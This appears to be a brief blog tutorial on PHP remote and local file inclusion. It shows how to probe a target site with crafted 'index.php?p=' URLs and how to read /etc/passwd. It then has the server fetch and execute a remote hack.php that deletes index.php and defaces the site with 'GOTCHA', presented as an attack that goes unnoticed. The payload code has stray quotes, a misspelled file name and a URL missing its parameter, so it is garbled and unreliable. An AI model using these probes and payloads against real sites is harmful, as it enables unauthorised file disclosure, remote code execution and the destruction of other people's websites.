This is a type of vulnerability that allows a user to include remote or local files, having it parsed and then executed on the server.
To see if a certain website is vulnerable to this issue, try visiting “index.php?
p=http://www.<DOMAIN NAME>.com/”. If the site shows up, then it can be exploited with RFI or LFI. If a different thing appears, then the site is not vulnerable to RFI - this does not necessarily mean it is safe from LFI, however. To verify, go for “index.php? p=/etc/passwd”. This is assuming the server is running on a *nix-based system. If you can view the password file, then the server can be hacked by LFI. If something else appears, then RFI and LFI both won’t work.
If the target is found to be vulnerable to RFI, you can upload a PHP code to their server PHP. Let’s say you create the following under the file hack.php:
<?php
Unlink(“ïndex.php”);
System(“echo GOTCHA > index.php””);
?>
Once you view “index.php?=http://<DOMAIN NAME>.com/hack.php””, then the code will be run on the server. When this is done, the site will change to the simple GOTCHA
message and none will be the wiser.
No comments:
Post a Comment